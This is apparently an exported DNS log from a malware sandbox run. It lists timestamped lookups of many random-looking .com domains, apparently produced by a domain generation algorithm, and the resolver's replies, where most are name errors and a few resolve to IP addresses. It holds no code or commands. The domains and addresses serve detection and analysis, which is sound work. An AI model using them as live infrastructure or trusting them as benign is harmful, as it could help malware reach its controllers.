                                                                                                                                                                                                          Sep 8, 2024 10:54:32.410753965 CEST192.168.2.91.1.1.10x4f8Standard query (0)lyxyjod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.411079884 CEST192.168.2.91.1.1.10x2a37Standard query (0)vofybet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.411340952 CEST192.168.2.91.1.1.10x4a75Standard query (0)puzyjov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.413945913 CEST192.168.2.91.1.1.10xa1a4Standard query (0)gadyvez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.414158106 CEST192.168.2.91.1.1.10xececStandard query (0)vowyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.418565989 CEST192.168.2.91.1.1.10x2174Standard query (0)lyvylyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.418854952 CEST192.168.2.91.1.1.10xfca8Standard query (0)vocykec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.420933962 CEST192.168.2.91.1.1.10x470bStandard query (0)pujymiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.433639050 CEST192.168.2.91.1.1.10xdb5fStandard query (0)lymytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.436696053 CEST192.168.2.91.1.1.10xaa3eStandard query (0)qexyqip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.404462099 CEST192.168.2.91.1.1.10xa5eeStandard query (0)vonykam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.404983997 CEST192.168.2.91.1.1.10x89a4Standard query (0)lysysir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.405554056 CEST192.168.2.91.1.1.10xccdbStandard query (0)pumyleg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.405639887 CEST192.168.2.91.1.1.10x18bStandard query (0)lymylen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.406008959 CEST192.168.2.91.1.1.10x2d0fStandard query (0)qekynyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.406135082 CEST192.168.2.91.1.1.10x4ed0Standard query (0)galynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.406622887 CEST192.168.2.91.1.1.10x20d9Standard query (0)qebykoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.407896042 CEST192.168.2.91.1.1.10x7a83Standard query (0)lykynyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.408633947 CEST192.168.2.91.1.1.10x9eb4Standard query (0)vopyput.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.410068989 CEST192.168.2.91.1.1.10x2e3aStandard query (0)pujybev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.411130905 CEST192.168.2.91.1.1.10x3f61Standard query (0)lyvyjoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.411370039 CEST192.168.2.91.1.1.10x39e8Standard query (0)gatypuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.413083076 CEST192.168.2.91.1.1.10x973Standard query (0)qetytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.413144112 CEST192.168.2.91.1.1.10x46f9Standard query (0)vojybef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.415091038 CEST192.168.2.91.1.1.10x8919Standard query (0)gahyvab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.415671110 CEST192.168.2.91.1.1.10x80caStandard query (0)qegyvag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.416043997 CEST192.168.2.91.1.1.10xae5fStandard query (0)lyrytyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.417270899 CEST192.168.2.91.1.1.10xd034Standard query (0)puvyjiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.424212933 CEST192.168.2.91.1.1.10x8413Standard query (0)vocyjik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.424454927 CEST192.168.2.91.1.1.10xae05Standard query (0)purytyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.424623013 CEST192.168.2.91.1.1.10x76baStandard query (0)gacyhuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.424771070 CEST192.168.2.91.1.1.10xcf5fStandard query (0)qedysol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.424890041 CEST192.168.2.91.1.1.10x8efStandard query (0)volymuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.455961943 CEST192.168.2.91.1.1.10xd147Standard query (0)lyxygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.475692034 CEST192.168.2.91.1.1.10x9952Standard query (0)qexyhul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.476057053 CEST192.168.2.91.1.1.10xf421Standard query (0)pufycog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.476834059 CEST192.168.2.91.1.1.10xaf3eStandard query (0)lygyvon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.477415085 CEST192.168.2.91.1.1.10xbcabStandard query (0)pumywov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.482507944 CEST192.168.2.91.1.1.10x6c1dStandard query (0)vonyqof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.483962059 CEST192.168.2.91.1.1.10xb992Standard query (0)lyryler.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.490042925 CEST192.168.2.91.1.1.10x96e4Standard query (0)vocymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.500930071 CEST192.168.2.91.1.1.10x32eeStandard query (0)lykyfax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.501447916 CEST192.168.2.91.1.1.10x94efStandard query (0)purylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.512659073 CEST192.168.2.91.1.1.10xd9eeStandard query (0)lygysid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.512939930 CEST192.168.2.91.1.1.10x741cStandard query (0)qegysiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.513122082 CEST192.168.2.91.1.1.10x5ec7Standard query (0)vopyzyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.513653994 CEST192.168.2.91.1.1.10x5782Standard query (0)vojydoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.513917923 CEST192.168.2.91.1.1.10x8431Standard query (0)gatyzyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.515445948 CEST192.168.2.91.1.1.10x25bdStandard query (0)qebyqig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.515892029 CEST192.168.2.91.1.1.10xc2eStandard query (0)volygyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.517093897 CEST192.168.2.91.1.1.10x3f9aStandard query (0)ganykah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.517519951 CEST192.168.2.91.1.1.10x84f4Standard query (0)ganyqib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.520792961 CEST192.168.2.91.1.1.10x80fStandard query (0)pufypuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.522505999 CEST192.168.2.91.1.1.10xe74Standard query (0)qetylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.522810936 CEST192.168.2.91.1.1.10x53a6Standard query (0)qekyfep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.523190975 CEST192.168.2.91.1.1.10xecb3Standard query (0)galyfez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.523654938 CEST192.168.2.91.1.1.10xdc10Standard query (0)qexynyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.524676085 CEST192.168.2.91.1.1.10x3dc7Standard query (0)lysyxuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.526267052 CEST192.168.2.91.1.1.10xa16Standard query (0)lymywad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.526871920 CEST192.168.2.91.1.1.10x3654Standard query (0)vofycim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.527165890 CEST192.168.2.91.1.1.10x8145Standard query (0)puzygyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.528367043 CEST192.168.2.91.1.1.10xc4caStandard query (0)vowykat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.529901028 CEST192.168.2.91.1.1.10x5ffeStandard query (0)qeqyrav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.530272007 CEST192.168.2.91.1.1.10xb48aStandard query (0)pupyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.530805111 CEST192.168.2.91.1.1.10xe9e3Standard query (0)pujydap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.534190893 CEST192.168.2.91.1.1.10xa122Standard query (0)qedyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.534513950 CEST192.168.2.91.1.1.10xb0daStandard query (0)lyvymun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.534701109 CEST192.168.2.91.1.1.10xa459Standard query (0)gadycih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.534841061 CEST192.168.2.91.1.1.10x6e0fStandard query (0)gahydos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.534959078 CEST192.168.2.91.1.1.10xc42aStandard query (0)pupypil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.535142899 CEST192.168.2.91.1.1.10x8e2Standard query (0)puvymug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.535157919 CEST192.168.2.91.1.1.10x53a6Standard query (0)gacynyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.536366940 CEST192.168.2.91.1.1.10xa7aStandard query (0)gaqyres.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.536442041 CEST192.168.2.91.1.1.10xd6c5Standard query (0)vowyrec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.336592913 CEST192.168.2.91.1.1.10x1189Standard query (0)puvyjiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.336720943 CEST192.168.2.91.1.1.10x79cfStandard query (0)gadycih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.337168932 CEST192.168.2.91.1.1.10xf22bStandard query (0)qegysiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.337168932 CEST192.168.2.91.1.1.10xfeeStandard query (0)gatypuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.337399960 CEST192.168.2.91.1.1.10x1e01Standard query (0)pupypil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.337624073 CEST192.168.2.91.1.1.10x8e91Standard query (0)gaqyres.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.337717056 CEST192.168.2.91.1.1.10xcc1cStandard query (0)puvymug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.337853909 CEST192.168.2.91.1.1.10x7618Standard query (0)qedyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.338239908 CEST192.168.2.91.1.1.10xaf18Standard query (0)volygyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.338337898 CEST192.168.2.91.1.1.10x89e1Standard query (0)puzygyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.381316900 CEST192.168.2.91.1.1.10x289aStandard query (0)gaqykoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.395673037 CEST192.168.2.91.1.1.10x5be1Standard query (0)lyxyfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.397833109 CEST192.168.2.91.1.1.10xc0b2Standard query (0)pufyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.400548935 CEST192.168.2.91.1.1.10xa2f9Standard query (0)qeqyqul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.429168940 CEST192.168.2.91.1.1.10x5ea9Standard query (0)lyrywoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.434072018 CEST192.168.2.91.1.1.10x97b6Standard query (0)pumyjip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.475549936 CEST192.168.2.91.1.1.10x21f3Standard query (0)pupyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.483194113 CEST192.168.2.91.1.1.10x52fdStandard query (0)qexyfag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.487935066 CEST192.168.2.91.1.1.10x3b9Standard query (0)puzydog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.489280939 CEST192.168.2.91.1.1.10xf344Standard query (0)vofypuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.492825985 CEST192.168.2.91.1.1.10x726eStandard query (0)ganyhus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.496958017 CEST192.168.2.91.1.1.10xb958Standard query (0)gahycuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.506491899 CEST192.168.2.91.1.1.10x246eStandard query (0)vowyqik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.509943008 CEST192.168.2.91.1.1.10x9a0dStandard query (0)lyvygyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.511066914 CEST192.168.2.91.1.1.10xc5a3Standard query (0)pujycil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.512257099 CEST192.168.2.91.1.1.10x9649Standard query (0)qetyraq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.518569946 CEST192.168.2.91.1.1.10x885cStandard query (0)lyxynej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.519172907 CEST192.168.2.91.1.1.10xb2ceStandard query (0)vopyrem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.522741079 CEST192.168.2.91.1.1.10xf89bStandard query (0)lykyvor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.526659966 CEST192.168.2.91.1.1.10x5293Standard query (0)gaqyqiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.528109074 CEST192.168.2.91.1.1.10xa00cStandard query (0)qekyvol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.539887905 CEST192.168.2.91.1.1.10x6934Standard query (0)vonyjuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.540117979 CEST192.168.2.91.1.1.10x42ddStandard query (0)lysytyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.540657043 CEST192.168.2.91.1.1.10xaabaStandard query (0)galyvaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.546624899 CEST192.168.2.91.1.1.10x201cStandard query (0)qeqykop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.548027039 CEST192.168.2.91.1.1.10x66b5Standard query (0)gacyfeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.548223972 CEST192.168.2.91.1.1.10xaa9dStandard query (0)lygyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.548399925 CEST192.168.2.91.1.1.10xe4fbStandard query (0)puzybeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.548439980 CEST192.168.2.91.1.1.10xf84fStandard query (0)puvygyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.548563004 CEST192.168.2.91.1.1.10xaa57Standard query (0)qebyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.557990074 CEST192.168.2.91.1.1.10xacbcStandard query (0)vofyzyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.558073044 CEST192.168.2.91.1.1.10x57cdStandard query (0)qedytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.559452057 CEST192.168.2.91.1.1.10x69b3Standard query (0)vocygef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.565335989 CEST192.168.2.91.1.1.10xfd01Standard query (0)qegyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.573093891 CEST192.168.2.91.1.1.10x9b9eStandard query (0)vojycit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.573479891 CEST192.168.2.91.1.1.10xf28cStandard query (0)gadypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.573714018 CEST192.168.2.91.1.1.10x4c84Standard query (0)gatyrah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.574079037 CEST192.168.2.91.1.1.10xa4eaStandard query (0)lymyjix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.576103926 CEST192.168.2.91.1.1.10xbbdeStandard query (0)purywoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.578700066 CEST192.168.2.91.1.1.10xa3ceStandard query (0)volybak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.119827986 CEST1.1.1.1192.168.2.90xc162Name error (3)lygygin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.126327991 CEST1.1.1.1192.168.2.90x768cName error (3)galykes.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.130729914 CEST1.1.1.1192.168.2.90xec14Name error (3)pupybul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.131402016 CEST1.1.1.1192.168.2.90xecd2Name error (3)ganypih.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.134285927 CEST1.1.1.1192.168.2.90x312eName error (3)qekykev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.138516903 CEST1.1.1.1192.168.2.90xb156Name error (3)vopybyt.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.140604973 CEST1.1.1.1192.168.2.90x82fcName error (3)lysynur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.141026020 CEST1.1.1.1192.168.2.90x809fName error (3)lykyjad.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.168390036 CEST1.1.1.1192.168.2.90x639bName error (3)vojyjof.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.183584929 CEST1.1.1.1192.168.2.90xdff3Name error (3)qetyvep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.192681074 CEST1.1.1.1192.168.2.90xf308Name error (3)puvytuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.198769093 CEST1.1.1.1192.168.2.90xde00Name error (3)vocyruk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.217689991 CEST1.1.1.1192.168.2.90x7b99Name error (3)lyryvex.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.225040913 CEST1.1.1.1192.168.2.90xd877Name error (3)lymysan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.225395918 CEST1.1.1.1192.168.2.90x3563Name error (3)gatyvyz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.235688925 CEST1.1.1.1192.168.2.90xee12No error (0)gahyqah.com162.255.119.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.235688925 CEST1.1.1.1192.168.2.90xee12No error (0)gahyqah.com23.253.46.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.236499071 CEST1.1.1.1192.168.2.90x3fbName error (3)purydyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.237612009 CEST1.1.1.1192.168.2.90x5d22Name error (3)qegyqaq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.340415955 CEST1.1.1.1192.168.2.90x10dName error (3)gahyhob.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.359174967 CEST1.1.1.1192.168.2.90xf990No error (0)qegyhig.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.359174967 CEST1.1.1.1192.168.2.90xf990No error (0)qegyhig.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.374366999 CEST1.1.1.1192.168.2.90x5f46Name error (3)lyryfyd.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.412106991 CEST1.1.1.1192.168.2.90xee91No error (0)vocyzit.com44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.437822104 CEST1.1.1.1192.168.2.90x650aName error (3)puvyxil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.458998919 CEST1.1.1.1192.168.2.90xeb48Name error (3)lyvytuj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.459013939 CEST1.1.1.1192.168.2.90xaf54No error (0)vonypom.com18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.464160919 CEST1.1.1.1192.168.2.90x7cbdName error (3)gacyryw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.466114044 CEST1.1.1.1192.168.2.90xc199Name error (3)lygymoj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.468369961 CEST1.1.1.1192.168.2.90x3ee2Name error (3)purycap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.524065971 CEST1.1.1.1192.168.2.90x5a1bName error (3)qekyqop.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.524872065 CEST1.1.1.1192.168.2.90x7a14Name error (3)gaqycos.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.525057077 CEST1.1.1.1192.168.2.90xdb0aName error (3)pufygug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.525456905 CEST1.1.1.1192.168.2.90xda5dName error (3)vowycac.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.526021004 CEST1.1.1.1192.168.2.90x73daName error (3)pujyjav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.526268005 CEST1.1.1.1192.168.2.90x2760Name error (3)volykyc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.527479887 CEST1.1.1.1192.168.2.90xf93bName error (3)qebytiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.528327942 CEST1.1.1.1192.168.2.90xe840Name error (3)vofymik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.529196024 CEST1.1.1.1192.168.2.90x22ceName error (3)lyxywer.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.529335976 CEST1.1.1.1192.168.2.90x2247Name error (3)lyxylux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.529731035 CEST1.1.1.1192.168.2.90x859Name error (3)qedynul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.529742002 CEST1.1.1.1192.168.2.90x405fName error (3)qexylup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.529750109 CEST1.1.1.1192.168.2.90xf3a2Name error (3)qeqysag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.530101061 CEST1.1.1.1192.168.2.90x8758Name error (3)qexyryl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.531179905 CEST1.1.1.1192.168.2.90xddc4No error (0)puzylyp.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.531640053 CEST1.1.1.1192.168.2.90x57e2Name error (3)pufymoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.536278963 CEST1.1.1.1192.168.2.90xeee1Name error (3)gaqydeb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.545376062 CEST1.1.1.1192.168.2.90x2da1No error (0)vojyqem.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.555727005 CEST1.1.1.1192.168.2.90x150aName error (3)qedyfyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.557822943 CEST1.1.1.1192.168.2.90x13d6Name error (3)pumypog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.560061932 CEST1.1.1.1192.168.2.90xa7caName error (3)volyqat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.560460091 CEST1.1.1.1192.168.2.90x667bName error (3)gadyfuh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.570348024 CEST1.1.1.1192.168.2.90x8002Name error (3)vonyzuf.comnonenoneA (IP address)IN (0x0001)false
